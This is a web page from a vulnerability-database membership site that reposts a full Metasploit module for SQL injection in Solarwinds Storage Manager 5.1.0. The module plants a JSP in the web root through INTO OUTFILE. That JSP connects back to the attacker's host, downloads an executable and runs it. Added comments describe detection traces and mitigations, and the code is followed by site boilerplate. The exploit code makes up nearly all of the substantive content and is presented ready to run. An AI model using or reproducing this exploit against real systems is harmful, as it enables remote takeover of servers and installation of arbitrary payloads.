Solarwinds_Storage_Manager_5.1.0_SQL注入漏洞

# Solarwinds Storage Manager 5.1.0 SQL注入漏洞
==EXP==

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

#
# Metasploit module for the SQL injection in the Solarwinds Storage Manager
# login servlet (advisories are listed under 'References').
#
# Order of operations, as implemented below:
#   1. exploit              - base64-encodes the generated executable, picks random
#                             names, starts a request thread, then calls super.
#   2. inject_exec          - POSTs to /LoginServlet with a UNION ... INTO OUTFILE
#                             query in 'loginName' so that a JSP is written under
#                             webapps/ROOT, then logs in and requests that JSP.
#   3. generate_jsp_payload - builds that JSP; it connects back to SRVHOST:SRVPORT,
#                             reads base64 text, writes a temp .exe and runs it.
#   4. on_client_connect    - serves the base64 executable to the connecting JSP.
#   5. on_new_session       - deletes the JSP through a meterpreter session.
#
# Traces this code leaves, useful for detection and incident response:
#   * POST /LoginServlet whose 'loginName' contains "union select 0x" and
#     "into outfile", followed by one whose 'loginName' is "1' or 1=1#--".
#   * A request for /<3-8 letters>.jsp at the web root, and that file under
#     C:/Program Files/SolarWinds/Storage Manager Server/webapps/ROOT/ until
#     on_new_session removes it.
#   * An outbound TCP connection from the server's Java process to the listener.
#   * A temp file created with a 3-8 letter prefix and ".exe" suffix; this module
#     never deletes it (see on_new_session).
#
# The chain depends on the login query accepting SQL from 'loginName' and on the
# database being able to write into the web root. Parameterised queries in the
# login handler, a database account without file-write rights (the FILE
# privilege, if the backend is MySQL as the "#" comment and 0x literal suggest),
# and a web root the database service cannot write to each break it.
#
class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::Remote::HttpClient
 include Msf::Exploit::Remote::TcpServer
 include Msf::Exploit::EXE

 #
 # Registers the module metadata and the RPORT option (default 9000).
 #
 # info - metadata hash passed in by the framework; merged via update_info.
 #
 def initialize(info={})
  super(update_info(info,
   'Name'           => "Solarwinds Storage Manager 5.1.0 SQL Injection",
   'Description'    => %q{
     This module exploits a SQL injection found in Solarwinds Storage Manager
    login interface.  It will send a malicious SQL query to create a JSP file
    under the web root directory, and then let it download and execute our malicious
    executable under the context of SYSTEM.
   },
   'License'        => MSF_LICENSE,
   'Author'         =>
    [
     'r@b13$', # Original discovery by Digital Defense VRT
     'muts',   # PoC
     'sinn3r'  # Metasploit
    ],
   'References'     =>
    [
     ['EDB', '18818'],
     ['URL', 'http://ddilabs.blogspot.com/2012/02/solarwinds-storage-manager-server-sql.html'],
     ['URL', 'http://www.solarwinds.com/documentation/storage/storagemanager/docs/ReleaseNotes/vulnerability.htm']
    ],
   'Payload'        =>
    {
     'BadChars' => "\x00",
    },
   'DefaultOptions'  =>
    {
     'ExitFunction' => "none"
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     # Win XP / 2003 / Vista / Win 7 / etc
     ['Windows Universal', {}]
    ],
   # NOTE(review): the description above says the payload runs as SYSTEM, yet
   # 'Privileged' is false - confirm which of the two is intended.
   'Privileged'     => false,
   'DisclosureDate' => "Dec 7 2011",
   'DefaultTarget'  => 0))

  register_options(
   [
    OptPort.new('RPORT', [true, 'The target port', 9000])
   ], self.class)
 end


 #
 # Fingerprints the login page only; it does not test the SQL injection itself.
 #
 # Returns Exploit::CheckCode::Detected when the response body matches both
 # patterns below, otherwise Exploit::CheckCode::Safe (also when there is no
 # response at all).
 #
 # NOTE(review): as printed here the first pattern requires a literal backslash
 # before "SolarWinds" and the second requires decoding="async" in the <img>
 # tag. Both look like artifacts of how this listing was published rather than
 # the product's real markup - confirm against the upstream module. Until then,
 # a Safe result from this listing is not evidence that a host is unaffected.
 #
 def check
  res = send_request_raw({
   'method' => 'GET',
   'uri'    => '/LoginServlet'
  })

  if res and res.body =~ /\\SolarWinds \- Storage Manager\<\/title\>/ and
             res.body =~ /\<img decoding="async" style="padding\-top:30px;" src="\/images\/logo_solarwinds_login\.png" width="163" height="70" alt="SolarWinds Storage Manager"\>/
   return Exploit::CheckCode::Detected
  else
   return Exploit::CheckCode::Safe
  end
 end


 #
 # Remove the JSP once we get a shell.
 # We cannot delete the executable because it will still be in use.
 #
 # cli - the new session object (despite the name, it is used as a session:
 #       its type, extensions and file API are read below).
 #
 # Only a meterpreter session triggers the cleanup; for any other session type
 # the JSP stays in the web root. The dropped executable is never removed by
 # this module, so it remains on disk as evidence in either case.
 #
 def on_new_session(cli)
  if cli.type != 'meterpreter'
   print_error("Meterpreter not used. Please manually remove #{@jsp_name + '.jsp'}")
   return
  end

  # Load the stdapi extension unless the session already has it aliased.
  cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")

  begin
   # @outpath is stored quoted and with forward slashes for the SQL statement;
   # convert it to a plain Windows path before deleting.
   jsp = @outpath.gsub(/\//, "\\\\")
   jsp = jsp.gsub(/"/, "")
   vprint_status("#{rhost}:#{rport} - Deleting: #{jsp}")
   cli.fs.file.rm(jsp)
   print_status("#{rhost}:#{rport} - #{@jsp_name + '.jsp'} deleted")
  # NOTE(review): rescuing ::Exception also catches non-StandardError
  # exceptions such as interrupts; ::StandardError would be the narrower choice.
  rescue ::Exception => e
   print_error("Unable to delete #{@jsp_name + '.jsp'}: #{e.message}")
  end
 end


 #
 # TcpServer callback: send the base64-encoded executable to the client that
 # just connected, then close that connection.
 #
 # cli - the connected client socket.
 #
 # No check is made on who the client is; every connection to the listener
 # receives the same data. The length printed is that of the base64 text.
 #
 def on_client_connect(cli)
  print_status("#{cli.peerhost}:#{cli.peerport} - Sending executable (#{@native_payload.length} bytes)")
  cli.put(@native_payload)
  service.close_client(cli)
 end


 #
 # Generate a download+exe JSP payload
 #
 # Reads @native_payload and @native_payload_name, which exploit sets first.
 #
 # Returns the JSP source as a hex string (no "0x" prefix), with newlines and
 # tabs removed, ready to be embedded in the SQL statement in inject_exec.
 #
 def generate_jsp_payload
  # When SRVHOST is the wildcard address, use the local source address that
  # would be used to reach 50.50.50.50 as the connect-back host.
  my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST']
  my_port = datastore['SRVPORT']

  # tmp folder = C:\Program Files\SolarWinds\Storage Manager Server\temp\
  # The JSP connects to my_host:my_port, reads characters until it has as many
  # as the base64 payload is long, decodes them, writes the bytes to a temp
  # file with an ".exe" suffix, and executes that file. Its empty catch block
  # swallows every exception, so a failure produces no error in the response.
  jsp = %Q|
  <%@page import="java.io.*"%>
  <%@page import="java.net.*"%>
  <%@page import="sun.misc.BASE64Decoder"%>

  <%
  StringBuffer buf = new StringBuffer();
  byte[] shellcode = null;
  BufferedOutputStream outstream = null;
  try {
   Socket s = new Socket("#{my_host}", #{my_port});
   BufferedReader r = new BufferedReader(new InputStreamReader(s.getInputStream()));
   while (buf.length() < #{@native_payload.length}) {
    buf.append( (char) r.read());
   }

   BASE64Decoder decoder = new BASE64Decoder();
   shellcode = decoder.decodeBuffer(buf.toString());

   File temp = File.createTempFile("#{@native_payload_name}", ".exe");
   String path = temp.getAbsolutePath();

   outstream = new BufferedOutputStream(new FileOutputStream(path));
   outstream.write(shellcode);
   outstream.close();

   Process p = Runtime.getRuntime().exec(path);
  } catch (Exception e) {}
  %>
  |

  # Collapse the JSP onto a single line before encoding.
  jsp = jsp.gsub(/\n/, '')
  jsp = jsp.gsub(/\t/, '')

  # Hex-encode so the whole file can travel as one 0x... literal in the query.
  jsp.unpack("H*")[0]
 end


 #
 # Run the actual exploit
 #
 # Sends three HTTP requests in sequence: the injection that writes the JSP,
 # a login that reuses the session cookie, and a request for the JSP itself.
 # Returns early, after printing an error, if no JSESSIONID cookie comes back
 # from the first request.
 #
 def inject_exec
  # This little lag is meant to ensure the TCP server runs first before the requests
  select(nil, nil, nil, 1)

  # Inject our JSP payload
  print_status("#{rhost}:#{rport} - Sending JSP payload")
  # Random 5-14 letter password; the same value is reused for the second login.
  pass = rand_text_alpha(rand(10)+5)
  hex_jsp  = generate_jsp_payload

  # 'loginName' carries the injection: a 14-column UNION SELECT whose first
  # column is the hex-encoded JSP, written to @outpath via INTO OUTFILE.
  # The trailing '#' comments out the remainder of the original query.
  res = send_request_cgi({
   'method'    => 'POST',
   'uri'       => '/LoginServlet',
   'headers'   => {
    'Accept-Encoding' => 'identity'
   },
   'vars_post'  => {
    'loginState' => 'checkLogin',
    'password'   => pass,
    'loginName'  => "AAA' union select 0x#{hex_jsp},2,3,4,5,6,7,8,9,10,11,12,13,14 into outfile #{@outpath}#"
   }
  })

  # Pick up the cookie, example:
  # JSESSIONID=D90AC5C0BB43B5AC1396736214A1B5EB
  if res and res.headers['Set-Cookie'] =~ /JSESSIONID=(\w+);/
   cookie = "JSESSIONID=#{$1}"
  else
   print_error("Unable to get a session ID")
   return
  end

  # Trigger the JSP
  print_status("#{rhost}:#{rport} - Trigger JSP payload")
  # Second login on the same session, this time with an always-true condition
  # in 'loginName'; the response is not inspected.
  send_request_cgi({
   'method'    => 'POST',
   'uri'       => '/LoginServlet',
   'headers'   => {
    'Cookie' => cookie,
    'Accept-Encoding' => 'identity'
   },
   'vars_post' => {
    'loginState' => 'checkLogin',
    'password'   => pass,
    'loginName'  => "1' or 1=1#--"
   }
  })

  # Request the written JSP from the web root; res is assigned but not read.
  res = send_request_raw({
   'method'  => 'POST',
   'uri'     => "/#{@jsp_name + '.jsp'}",
   'headers' => {
    'Cookie' => cookie
   }
  })

  # presumably hands control to the framework's payload handler - confirm
  handler
 end


 #
 # The server must start first, and then we send the malicious requests
 #
 # Sets the instance state the other methods read (@native_payload,
 # @native_payload_name, @jsp_name, @outpath), starts inject_exec on a
 # framework thread, then calls super. The request thread is killed in the
 # ensure clause whichever way super returns.
 #
 def exploit
  # Avoid passing this as an argument for performance reasons
  # Base64-encode the executable to make sure the file isn't mangled in transit
  @native_payload      = [generate_payload_exe].pack("m*")
  # Random 3-8 letter names for the temp-file prefix and for the JSP.
  @native_payload_name = rand_text_alpha(rand(6)+3)
  @jsp_name            = rand_text_alpha(rand(6)+3)
  # Quoted, forward-slash path: this string is placed verbatim after
  # "into outfile" in the SQL statement built by inject_exec.
  @outpath             = "\"C:/Program Files/SolarWinds/Storage Manager Server/webapps/ROOT/#{@jsp_name + '.jsp'}\""

  begin
   t = framework.threads.spawn("reqs", false) { inject_exec }
   print_status("Serving executable on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
   # presumably resolves to the TcpServer mixin's exploit, which would start
   # the listener - confirm against the mixin
   super
  ensure
   # NOTE(review): if spawn itself raised, t is nil here and t.kill would raise
   # NoMethodError - confirm whether that case needs a guard.
   t.kill
  end
 end
end


href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87/" class="text-ellipsis but c-blue-2">鼠标</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e9%94%99%e8%af%af%e9%a1%b5%e9%9d%a2%e8%b7%a8%e7%ab%99%e7%82%b9%e8%84%9a%e6%9c%ac/" class="text-ellipsis but c-yellow-2">默认错误页面跨站点脚本</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e9%85%8d%e7%bd%ae%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c/" class="text-ellipsis but c-green-2">默认配置远程代码执行</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e7%ae%a1%e7%90%86%e5%91%98%e5%87%ad%e6%8d%ae/" class="text-ellipsis but c-purple-2">默认管理员凭据</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e7%9a%84%e8%b0%83%e5%88%b6%e8%a7%a3%e8%b0%83%e5%99%a8%e4%b8%8a%e7%9a%84%e5%af%86%e7%a0%81%e7%a1%ac%e4%bb%b6%e8%bf%9c%e7%a8%8b/" class="text-ellipsis but c-red-2">默认的调制解调器上的密码硬件远程</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e6%9d%83%e9%99%90/" class="text-ellipsis but c-blue">默认权限</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e6%9d%83%e5%88%a9/" class="text-ellipsis but c-yellow">默认权利</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%bc%b1%e5%af%86%e7%a0%81%e7%bc%96%e7%a0%81/" class="text-ellipsis but c-green">默认弱密码编码</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%af%86%e7%a0%81/" class="text-ellipsis but c-purple">默认密码</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%ae%89%e5%85%a8%e6%80%a7%e7%a1%ac%e4%bb%b6%e8%bf%9c%e7%a8%8b/" class="text-ellipsis but c-red">默认安全性硬件远程</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%92%8c%e5%bc%b1%e5%8a%a0%e5%af%86/" class="text-ellipsis but ">默认和弱加密</a></div></div></div></main><div class="container fluid-widget"></div><footer class="footer"><div class="container-fluid container-footer"><ul class="list-inline"><li class="hidden-xs" style="max-width: 300px;"><p><a class="footer-logo" href="https://vip.bdziyi.com" title="棉花糖VIP-网络安全资源大全-漏洞库"> <img 
src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2024/11/20241126051508458.jpg" switch-src="https://oss.bdziyi.com/vip/2024/11/20241126051508458.jpg" alt="棉花糖VIP-网络安全资源大全-漏洞库" class="lazyload" style="height: 40px;"> </a></p><div class="footer-muted em09">本站为棉花糖会员站</div></li><li style="max-width: 550px;"><p class="fcode-links"><a href="https://oss.bdziyi.com/vip/2024/03/20240324085635914.png">友链申请</a> <a href="https://oss.bdziyi.com/vip/2024/03/20240324085635914.png">广告合作</a></p><div class="footer-muted em09">Copyright © 2024 · <a href="https://vip.bdziyi.com">棉花糖会员站</a><p><a href="https://beian.miit.gov.cn/" style="color: #fbbc05;" target="_blank">沪ICP备2023017240号</a></p></div><div class="footer-contact mt10"><a class="toggle-radius hover-show nowave" href="javascript:;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-d-wechat"></use></svg><div class="hover-show-con footer-wechat-img"><img style="box-shadow: 0 5px 10px rgba(0,0,0,.2); border-radius:4px;" height="100" class="lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2024/03/20240324085635914.png" alt="扫一扫加微信-棉花糖会员站"></div></a><a class="toggle-radius" data-toggle="tooltip" title="发邮件" href="mailto:1113335577@QQ.COM"><svg class="icon" aria-hidden="true" data-viewBox="-20 80 1024 1024" viewBox="-20 80 1024 1024"><use xlink:href="#icon-d-email"></use></svg></a></div></li><li><div class="footer-miniimg" data-toggle="tooltip" title="扫码加微信"><p> <img class="lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2024/03/20240324085635914.png" alt="扫码加微信-棉花糖会员站"></p> <span class="opacity8 em09">扫码加微信</span></div></li></ul></div></footer> <script type="text/javascript">window._win = {
            views: '2237',
            www: 'https://vip.bdziyi.com',
            uri: 'https://vip.bdziyi.com/wp-content/themes/zibll',
            ver: '7.9_beta2',
            imgbox: '1',
            imgbox_type: 'group',
            imgbox_thumbs: '1',
            imgbox_zoom: '1',
            imgbox_full: '1',
            imgbox_play: '1',
            imgbox_down: '1',
            sign_type: 'modal',
            signin_url: 'https://vip.bdziyi.com/user-sign-6/?tab=signin&redirect_to=https%3A%2F%2Fvip.bdziyi.com%2F2237%2F',
            signup_url: 'https://vip.bdziyi.com/user-sign-6/?tab=signup&redirect_to=https%3A%2F%2Fvip.bdziyi.com%2F2237%2F',
            ajax_url: 'https://vip.bdziyi.com/wp-admin/admin-ajax.php',
            ajaxpager: '',
            ajax_trigger: '<i class="fa fa-angle-right"></i>加载更多',
            ajax_nomore: '没有更多内容了',
            qj_loading: '1',
            highlight_kg: '1',
            highlight_hh: '1',
            highlight_btn: '1',
            highlight_zt: 'enlighter',
            highlight_white_zt: 'enlighter',
            highlight_dark_zt: 'dracula',
            upload_img_size: '3',
            img_upload_multiple: '6',
            upload_video_size: '30',
            upload_file_size: '30',
            upload_ext: 'jpg|jpeg|jpe|gif|png|bmp|tiff|tif|webp|avif|ico|heic|asf|asx|wmv|wmx|wm|avi|divx|flv|mov|qt|mpeg|mpg|mpe|mp4|m4v|ogv|webm|mkv|3gp|3gpp|3g2|3gp2|txt|asc|c|cc|h|srt|csv|tsv|ics|rtx|css|vtt|dfxp|mp3|m4a|m4b|aac|ra|ram|wav|ogg|oga|flac|mid|midi|wma|wax|mka|rtf|pdf|class|tar|zip|gz|gzip|rar|7z|psd|xcf|doc|pot|pps|ppt|wri|xla|xls|xlt|xlw|mdb|mpp|docx|docm|dotx|dotm|xlsx|xlsm|xlsb|xltx|xltm|xlam|pptx|pptm|ppsx|ppsm|potx|potm|ppam|sldx|sldm|onetoc|onetoc2|onetmp|onepkg|oxps|xps|odt|odp|ods|odg|odc|odb|odf|wp|wpd|key|numbers|pages',
            user_upload_nonce: '488af42e0d',
            is_split_upload: '1',
            split_minimum_size: '20',
            comment_upload_img: '1'
        }</script> <div class="float-right round position-bottom"><a style="--this-color:#f2c97d;--this-bg:rgba(62,62,67,0.9);" class="float-btn signin-loader" data-toggle="tooltip" data-placement="left" title="开通会员" href="javascript:;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-vip_1"></use></svg></a><span class="newadd-btns hover-show float-btn add-btn"> <svg class="icon" aria-hidden="true"><use xlink:href="#icon-add-ring"></use></svg><div class="hover-show-con dropdown-menu drop-newadd"><a rel="nofollow" class="btn-newadd" href="https://vip.bdziyi.com/newposts-5/"><icon class="jb-green"><i class="fa fa-pencil-square"></i></icon><text>投稿文章</text></a><a rel="nofollow" class="btn-newadd" href="https://vip.bdziyi.com/posts-edit"><icon class="jb-blue"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-posts"></use></svg></icon><text>发布帖子</text></a></div> </span><a class="float-btn service-wechat hover-show nowave" title="扫码添加微信" href="javascript:;"><i class="fa fa-wechat"></i><div class="hover-show-con dropdown-menu"><img class="radius4 relative" width="100%" class="lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2024/03/20240324085635914.png"  alt="扫码添加微信-棉花糖会员站"></div></a><span class="float-btn qrcode-btn hover-show service-wechat"><i class="fa fa-qrcode"></i><div class="hover-show-con dropdown-menu"><div class="qrcode" data-size="100"></div><div class="mt6 px12 muted-color">在手机上浏览此页面</div></div></span><a class="float-btn ontop fade" data-toggle="tooltip" data-placement="left" title="返回顶部" href="javascript:(scrollTo());"><i class="fa fa-angle-up em12"></i></a></div><div mini-touch="nav_search" touch-direction="top" class="main-search fixed-body main-bg box-body navbar-search nopw-sm"><div class="container"><div class="mb20"><button class="close" data-toggle-class data-target=".navbar-search" ><svg class="ic-close" aria-hidden="true"><use 
xlink:href="#icon-close"></use></svg></button></div><div remote-box="https://vip.bdziyi.com/wp-admin/admin-ajax.php?action=search_box" load-click><div class="search-input"><p><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i></p><p class="placeholder k2"></p><p class="placeholder t1"></p><p><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i></p><p class="placeholder k1"></p><p class="placeholder t1"></p><p></p><p class="placeholder k1" style="height: 80px;"></p></div></div></div></div><div class="modal fade" id="u_sign" tabindex="-1" role="dialog"><div class="modal-dialog" role="document"><div class="sign-content"><div class="sign-img absolute hide-sm"><img class="fit-cover radius8 lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://oss.bdziyi.com/vip/2024/04/20240411155954828.jpg" alt="棉花糖VIP-网络安全资源大全-漏洞库"></div><div class="sign zib-widget blur-bg relative"> <button class="close" data-dismiss="modal"> <svg class="ic-close" aria-hidden="true" data-viewBox="0 0 1024 1024" viewBox="0 0 1024 1024"><use xlink:href="#icon-close"></use></svg> </button><div class="text-center"><div class="sign-logo box-body"><img src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2024/03/20240324080312906.png" switch-src="https://oss.bdziyi.com/vip/2024/03/20240324080312906.png" alt="棉花糖VIP-网络安全资源大全-漏洞库" class="lazyload"></div></div><div class="tab-content"><div class="tab-pane fade active in" id="tab-sign-in"><div class="box-body"><div class="title-h-left fa-2x">登录</div><a class="muted-color px12" href="#tab-sign-up" data-toggle="tab">没有账号?立即注册<i class="em12 ml3 fa fa-angle-right"></i></a></div><div id="sign-in"><form><div class="relative line-form mb10"><input type="text" name="username" class="line-form-input" tabindex="1" placeholder=""><i 
class="line-form-line"></i><div class="scale-placeholder">用户名或邮箱</div></div><div class="relative line-form mb10"><input type="password" name="password" class="line-form-input" tabindex="2" placeholder=""><div class="scale-placeholder">登录密码</div><div class="abs-right passw muted-2-color"><i class="fa-fw fa fa-eye"></i></div><i class="line-form-line"></i></div><input machine-verification="geetest" type="hidden" name="captcha_mode" value="geetest" geetest-id="246fa471ce4513eb6fa70847deb7f3f5"><div class="relative line-form mb10 em09"><span class="muted-color form-checkbox"><input type="checkbox" id="remember" checked="checked" tabindex="4" name="remember" value="forever"><label for="remember" class="ml3">记住登录</label></span><span class="pull-right muted-2-color"><a rel="nofollow" class="muted-2-color" href="https://vip.bdziyi.com/user-sign-6/?tab=resetpassword&redirect_to=https%3A%2F%2Fvip.bdziyi.com%2F2237%2F">找回密码</a></span></div><div class="box-body"><input type="hidden" name="action" value="user_signin"><button type="button" class="but radius jb-blue padding-lg signsubmit-loader btn-block"><i class="fa fa-sign-in mr10"></i>登录</button></div></form><p class="social-separator separator muted-3-color em09">社交账号登录</p><div class="social_loginbar"><a rel="nofollow" title="微信登录" href="https://vip.bdziyi.com/oauth/weixingzh?rurl=https%3A%2F%2Fvip.bdziyi.com%2F2237%2F" class="social-login-item weixingzh toggle-radius qrcode-signin"><i class="fa fa-weixin" aria-hidden="true"></i></a></div><div class="muted-color mt10 text-center px12 opacity8">使用社交账号登录即表示同意<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/%e7%94%a8%e6%88%b7%e5%8d%8f%e8%ae%ae/">用户协议</a>、<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/privacy-policy/">隐私声明</a></div></div></div><div class="tab-pane fade" id="tab-sign-up"><div class="box-body"><div class="title-h-left fa-2x">注册</div><a class="muted-color px12" href="#tab-sign-in" data-toggle="tab">已有账号,立即登录<i class="em12 ml3 
fa fa-angle-right"></i></a></div><form id="sign-up"><div class="relative line-form mb10"><input type="text" name="name" class="line-form-input" tabindex="1" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">设置用户名</div></div><div class="relative line-form mb10"><input change-show=".change-show" type="text" name="email" class="line-form-input" tabindex="1" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">邮箱</div></div><input machine-verification="geetest" type="hidden" name="captcha_mode" value="geetest" geetest-id="246fa471ce4513eb6fa70847deb7f3f5"><div class="relative line-form mb10 change-show"><input type="text" name="captch" class="line-form-input" autocomplete="off" tabindex="2" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">验证码</div><span class="yztx abs-right"><button type="button" form-action="signup_captcha" class="but c-blue captchsubmit">发送验证码</button></span><div class="abs-right match-ok muted-color"><i class="fa-fw fa fa-check-circle"></i></div><input type="hidden" name="captcha_type" value="email"><input type="hidden" id="_wpnonce" name="_wpnonce" value="d0e1114113" /></div><div class="relative line-form mb10"><input type="password" name="password2" class="line-form-input" tabindex="3" placeholder=""><div class="scale-placeholder">设置密码</div><div class="abs-right passw muted-2-color"><i class="fa-fw fa fa-eye"></i></div><i class="line-form-line"></i></div><div class="relative line-form mb10"><input type="password" name="repassword" class="line-form-input" tabindex="4" placeholder=""><div class="scale-placeholder">重复密码</div><div class="abs-right passw muted-2-color"><i class="fa-fw fa fa-eye"></i></div><i class="line-form-line"></i></div><div class="box-body"><input type="hidden" name="action" value="user_signup"><button type="button" class="but radius jb-green padding-lg signsubmit-loader btn-block"><svg class="icon mr10" aria-hidden="true" data-viewBox="0 0 1024 1024" 
viewBox="0 0 1024 1024"><use xlink:href="#icon-signup"></use></svg>注册</button><div class="form-checkbox muted-color mt10 text-center px12 opacity8"><input name="user_agreement" id="user_agreement" type="checkbox"><label for="user_agreement" class="px12 ml6" style="font-weight:normal;">已阅读并同意<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/%e7%94%a8%e6%88%b7%e5%8d%8f%e8%ae%ae/">用户协议</a>、<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/privacy-policy/">隐私声明</a></label></div></div></form></div><div class="tab-pane fade" id="tab-qrcode-signin"><div class="box-body"><div class="title-h-left fa-2x">扫码登录</div><span class="muted-3-color px12">使用<a class="muted-color" href="#tab-sign-in" data-toggle="tab">其它方式登录</a>或<a class="muted-color" href="#tab-sign-up" data-toggle="tab">注册</a></span><a class="muted-color px12 hide" href="#tab-qrcode-signin" data-toggle="tab">扫码登录</a></div><div class="qrcode-signin-container box-body text-center"><p class="placeholder" style="height:180px;width:180px;margin:auto;"></p><p class="placeholder" style="height:27px;width:200px;margin:15px auto 0;"></p></div><div class="muted-color mt10 text-center px12 opacity8">扫码登录即表示同意<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/%e7%94%a8%e6%88%b7%e5%8d%8f%e8%ae%ae/">用户协议</a>、<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/privacy-policy/">隐私声明</a></div></div></div></div></div></div></div><div class="modal fade" id="modal-system-notice" tabindex="-1" role="dialog"><div class="modal-dialog modal-mini" style="" role="document"><div class="modal-content"><div class="modal-body"><div style="padding: 1px;"><div class="modal-colorful-header colorful-bg jb-yellow"><button class="close" data-dismiss="modal"><svg class="ic-close" aria-hidden="true"><use xlink:href="#icon-close"></use></svg></button><div class="colorful-make"></div><div class="text-center"><div class="em2x"><svg class="icon" aria-hidden="true"><use 
xlink:href="#icon-vip_1"></use></svg></div><div class="mt10 em12 padding-w10">会员低价促销中~</div></div></div><div><body><p style="color: orange;">新版现已发布,新增多项新功能及细节优化,欢迎体验</p><p style="color: blue;">独家代码审计、凌风云自助获取、IP街道级定位等功能已上线</p><p style="color: green;">网络安全从拥有一个资源大全开始!</p><p style="color: red;">现在购买仅需99元一年!续费还享八折!</p> <script defer src="https://vip.bdziyi.com/wp-content/cache/autoptimize/js/autoptimize_484fcf6d88f4cdc1383c2322e0d74667.js"></script></body></div></div></div><div class="modal-buts box-body notop text-right"><a type="button" target=_blank class="but radius c-blue" href="http://s.mrw.so/6XqGa">详细介绍</a><a type="button" class="but radius c-green" href="https://vip.bdziyi.com/index.php/user-sign/">注册登陆</a></div></div></div></div> <script type="text/javascript">window.onload = function(){
        setTimeout(function () {$('#modal-system-notice').modal('show');
        $.cookie("showed_system_notice","showed", {path: "/",expires: 1});
    }, 500)};</script> <script type="text/javascript">var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?b1d5fe7471881173b0b5a05d2c916139";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();

var links = document.querySelectorAll('.item-tags a');

for (var i = 0; i < links.length; i++) {
  var randomColor;
  do {
    var r = Math.floor(Math.random() * 128) + 128;
    var g = Math.floor(Math.random() * 128) + 128;
    var b = Math.floor(Math.random() * 128) + 128;
    randomColor = 'rgb(' + r + ',' + g + ',' + b + ')';
  } while ((r * 0.299 + g * 0.587 + b * 0.114) > 200); // 确保亮度不超过200

  links[i].style.backgroundColor = randomColor;
}

//视频
$(document).ready(function() {
    $('#xiayg').on('click', function() {
        var $videoElement = $('.dplayer-video-wrap .dplayer-video.dplayer-video-current');

        if ($videoElement.length) {
            $videoElement.attr('src', 'https://api.86512.cn/api/web.php');
            $videoElement[0].load();
            $videoElement[0].play();
        } else {
            console.error('找不到视频元素');
        }
    });
});</script>  <script type="text/javascript">(function() {
            var bp = document.createElement('script');
            var curProtocol = window.location.protocol.split(':')[0];
            if (curProtocol === 'https') {
                bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
            } else {
                bp.src = 'http://push.zhanzhang.baidu.com/push.js';
            }
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(bp, s);
        })();</script>  <script type="text/javascript">console.log("数据库查询:11次 | 页面生成耗时:5845.266ms");</script> <script type="text/javascript">window.WeChatShareDate = {
        appId: 'wx8c358971b57c3409',
        timestamp: '1735222089',
        nonceStr: 'Glszhm5lN7Wapv7B',
        signature: 'c94d461db1e965e4c75b3481ec4eda6cf3960472',
        url: 'https://vip.bdziyi.com/2237/',
        title: '',
        img: 'https://oss.bdziyi.com/vip/2024/03/20240324075052980.jpg',
        desc: '',
    }</script> <script type="text/javascript">_win.signin_wx_priority = true;</script> </body></html>